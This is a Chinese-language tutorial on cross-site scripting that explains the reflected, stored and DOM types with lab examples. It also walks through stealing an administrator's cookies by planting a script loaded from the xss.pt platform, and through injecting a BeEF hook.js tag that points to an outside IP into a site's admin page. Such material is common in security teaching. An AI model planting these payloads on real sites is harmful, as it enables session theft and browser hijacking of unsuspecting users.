XSS跨站脚本攻击技术(一)
XSS的定义
XSS攻击,全称为跨站脚本攻击,是指攻击者通过在网页中插入恶意脚本代码,当用户浏览该网页时,恶意脚本会被执行,从而达到攻击目的的一种安全漏洞。这些恶意脚本可以窃取用户的敏感信息,如Cookie、会话令牌等,或者诱导用户执行不安全的操作,如点击恶意链接、下载恶意软件等。
XSS的原理
它是由前端JavaScript代码造成的,具体来说,是Web应用程序在处理用户输入时未能充分验证和过滤,导致恶意脚本被注入到网页中并由用户的浏览器执行。这种漏洞通常发生在动态网页中,其中JavaScript代码用于与服务器进行交互、更新页面内容或处理用户输入。由于JavaScript代码在用户的浏览器中执行,因此攻击者可以利用这一特性来构造恶意脚本,从而控制用户的浏览器进行恶意操作。
XSS的危害
理论上,只要JavaScript功能能够实现的操作,XSS攻击都有可能加以利用并实现。如:
- 实施网络钓鱼,包括窃取各类用户账号信息,严重威胁用户的信息安全。
- 窃取浏览器中用户的cookies资料,进而获取用户的隐私信息,甚至利用用户身份对网站执行非法操作。
- 劫持用户(浏览器)会话,使攻击者能够执行任意操作,如非法转账、发表日志、发送邮件等,对用户造成直接的经济损失或声誉损害。
- 强制弹出广告页面、刷流量等,干扰用户的正常使用体验,同时损害网站的正常运营。
- 网页挂马,将恶意软件或病毒植入用户电脑,进一步危害用户的系统安全。
- 进行恶意操作,如任意篡改页面信息、删除文章等,破坏网站内容的完整性和真实性。
- 发起大量的客户端攻击,如DDoS攻击,影响网站的正常访问和稳定性。
- 获取客户端信息,如用户的浏览历史、真实IP、开放端口等,为进一步的攻击提供情报支持。
- 控制受害者机器向其他网站发起攻击,形成攻击链,扩大攻击范围。
- 结合其他漏洞,如CSRF漏洞,实施更为复杂的攻击,提升攻击的成功率和危害性。
- 提升用户权限,包括进一步渗透网站,获取更高级别的访问权限和数据访问能力。
- 传播跨站脚本蠕虫,实现自动化的攻击传播和感染,造成更广泛的网络安全威胁。
XSS攻击的主要类型
反射型XSS
定义:反射型XSS,也称为非持久型或参数型XSS,是指攻击者通过构造包含恶意脚本的URL参数,当用户点击该链接时,恶意脚本会被回显到网页上并执行。
特点:反射型XSS攻击通常发生在用户与Web应用程序进行交互时,如搜索、提交表单等。由于恶意脚本是通过URL参数传递的,因此其生命周期较短,一旦用户关闭页面或清除浏览器缓存,恶意脚本就会消失。
示例:
有这么一个情况,如后端接受GET请求中的变量,并在前端直接输出该变量,
php
<?php
// 接收GET请求中的'x'参数
$code = $_GET['x'];
// 直接输出变量,未进行任何过滤或转义
echo $code;
?>
正常访问:
当你使用正常参数访问该页面时,比如:x=1123
x接收到值会在页面中显示,假如传输x的值改成JavaScript的弹窗代码:
x=<script>alert(1)</script>
查看源代码,发现显示内容会出现在审查元素中:
按正常来说,应该显示<script>alert(1)</script>,但是这里显示空白。是因为这段代码被当成JavaScript代码去执行了。执行出的效果就是弹窗。
在产生过程中,有一个输入的值,还有个输出的值。这就是跨站产生的基本原理。但这种漏洞是一次性的,只有访问构造的地址http://127.0.0.1:8081/web/mysql/xss.php?x=\<script>alert(1)</script>才可以触发此类漏洞。必须构造给别人,让别人访问,才能触发漏洞。
在这里,"反射"指的是恶意脚本被服务器接收后,几乎立即被"反射"回用户的浏览器,就像一面镜子一样。
存储型XSS(攻击代码被写进了数据库里)
定义:存储型XSS,也称为持久型XSS,是指攻击者将包含恶意脚本的内容提交到Web应用程序中,并永久存储在服务器上。当其他用户浏览该内容时,恶意脚本会被执行。
特点:存储型XSS攻击的危害性较大,因为恶意脚本被永久存储在服务器上,可以持续影响所有访问该内容的用户。此外,攻击者还可以利用存储型XSS攻击进行更复杂的攻击,如传播跨站脚本蠕虫、构建僵尸网络等。
危害:存储型XSS可能导致用户信息泄露、账户劫持、恶意软件传播等严重后果。攻击者可以利用窃取的用户Cookie进行会话劫持,或者诱导用户执行不安全的操作,如输入敏感信息、下载恶意软件等。安全产商一般只会接受存储型XSS,不会接受反射型XSS(太鸡肋)。
示例:
场景描述
假设有一个在线留言板应用,允许用户提交留言并显示在网页上。这些留言被存储在服务器的数据库中,当用户访问留言板页面时,服务器会从数据库中检索留言并显示在网页上。
攻击过程
- 恶意输入:
- 攻击者在留言框中输入一段包含恶意脚本的留言,例如:
<script>alert('恶意代码执行!');</script>
。- 攻击者提交这段留言。
- 存储恶意代码:
- 服务器接收到这段留言后,未进行充分的验证或过滤,就将其存储在数据库中。
- 反射恶意代码:
- 当其他用户访问留言板页面时,服务器从数据库中检索留言,并将其嵌入到HTML页面中返回给用户。
- 由于恶意代码被直接嵌入到页面中,当用户的浏览器解析这段HTML时,会执行其中的恶意脚本。
- 攻击结果:
- 用户的浏览器弹出一个警告框,显示"恶意代码执行!"。
- 这只是恶意脚本的一个简单示例,实际攻击中,恶意脚本可能会窃取用户的敏感信息、执行未经授权的操作、重定向用户到恶意网站等。
DOM型XSS
定义 :DOM型XSS是指攻击者通过构造特殊URL或利用网页功能发送恶意代码请求,当受害者浏览器处理这些请求时,会修改DOM树并执行恶意脚本。DOM型不与后台服务器产生数据交互,是一种通过DOM操作前端代码输出的时候产生的问题,一次性也属于反射型。所以DOM型xss取决于输出位置,并不取决于输出环境,因此DOM型xss既有可能是反射型的,也有可能是存储型的
特点:与反射型和存储型XSS不同,DOM型XSS的攻击载荷是在受害者浏览器本地执行的。因此,其相对难以通过传统的输入验证和过滤方法进行防御。此外,DOM型XSS攻击通常与Web应用程序的具体实现细节相关,因此其攻击方式和防御措施也因人而异。
示例:pikachu靶场-DOM型,代码如下
点击click me后, F12查看具体情况,可以看出输入内容会构造一个a标签,并将输入内容作为参数href的值,放在id=dom的容器里
而把而已代码拼接到了a标签里面,尝试构造闭合触发弹窗
javascript
#" onclick="alert('xss')">
真实案例和XSS平台
- 反射型实例-UA查询平台数据输出
平台:useragent.openadmintools.com
访问这个平台,可以发现他抓取了访问者的浏览器信息,重新进行访问,抓包,修改数据包UA头。
<script>alert(xss)</script>
数据包发送,就可以看到浏览器弹窗。
但是这类漏洞构成危害不大。因为这个需要在UA头中修改,那么要怎么发给别人。别人访问的时候又不会修改UA头再去访问。
反射型xss的漏洞不好利用的原因:
①让对方去访问构造地址;
②对方是网站管理员,获取其登录的cookies信息;
③浏览器会自动过滤xss的攻击;
2. 存储型实例-订单系统CMS权限获取
① 前台填写信息(包含了XSS代码),下订单;
② XSS代码被插入到了数据库;
③ 登录后台进行订单查看时,js代码被执行,弹出js执行代码的窗口,这就形成了xss攻击。
进行留言,在留言上写上payload
那么如何获取管理员的cookie呢?
xss利用平台:网上找或者自己搭建
(1)网上找的平台,注册一个账号:比如,https://xss.pt/xss.php
① 创建项目,然后进行功能选择,查看代码
② 复制一个代码:<sCRiPt sRC=//xss.pt/X8Vz></sCrIpT>
③ 将代码从目标网站的前台写入
④ 等待目标网站的管理员访问,在下面等待cookie的接收
回到xss平台
比如对后台admin/admin.php?uid=3进行访问,抓包。将获得的cookie信息复制到数据包中。
但是这个cookie不能进行登录,因为这个平台获取到的cookie信息不完整,在正常登录中cookie中还有phpsessid的值,未获取到;
这个网站采用的不是cookie验证,而是phpsessid进行验证,所以无法登录后台。通常,有的网站不止使用cookie,还会使用phpsessid、httponly等进行登录保护。
(2)自己搭建xss利用平台(BeEF平台)
搭建:https://blog.csdn.net/qq_40624810/article/details/110958036
kali安装docker:https://blog.csdn.net/m0_67844671/article/details/132872790
安装BeEF:Beef-Xss 浏览器攻击框架的使用_docker安装beef-xss-CSDN博客
安装完成后,访问http://192.168.132.130:3000/ui/panel
默认账号密码beef,beef
在BeEF网站下面有一个hook.js文件,只要加载了这个地址,就会劫持这个浏览器。
将xss跨站代码写入到登录成功的文件,比如admin/index.php文件
<script src="http://47.100.167.248:3000/hook.js"></script> //注意IP地址改成自己beef的ip
这个平台也可以获取cookie,跳转,下载,钓鱼,伪装成flash。
3.DOM型实例-EmpireCMS前端页面审计
DOM类型的全都是前端的代码,所以基本上都是白盒审计
在upload/e/Viewimg/index.html 发现关键代码:
if(Request("url")!=0){
document.write("<a title=\"点击观看完整的图片...\" href=\""+Request("url")+"\" target=\"_blank\"><img src=\""+Request("url")+"\" border=0 class=\"picborder\" onmousewheel=\"return bbimg(this)\" οnlοad=\"if(this.width>screen.width-500)this.style.width=screen.width-500;\">");
}
追踪request函数
简单来说,这个request函数就是用来接收URL的地址
那么要怎么构造他呢?
访问地址http://127.0.0.1:8103/e/Viewimg/index.html
测试:http://127.0.0.1:8103/e/Viewimg/index.html?url=1
url的参数1在路径访问时并没有被当做参数,而是直接被当做文件名访问,那么应该怎么触发跨站呢?
http://127.0.0.1:8103/e/Viewimg/index.html?url=javascript:alert(1)
这样子构造在源代码中
document.write("<a title=\"点击观看完整的图片...\" href=\""+javascript:alert(1)+"\" target=\"_blank\"><img src=\""+Request("url")+"\" border=0 class=\"picborder\" onmousewheel=\"return bbimg(this)\" οnlοad=\"if(this.width>screen.width-500)this.style.width=screen.width-500;\">");
点击后的地址进行了弹窗:即这个地址http://127.0.0.1:8103/e/Viewimg/javascript:alert(1)执行了js代码
五、XSS平台与工具框架预告
- XSS平台:介绍XSS攻击平台的概念,并预告后续文章将详细介绍常见的XSS平台。
- BEEF-XSS框架:提及BEEF框架,并预告后续文章将深入探讨其使用方法和功能。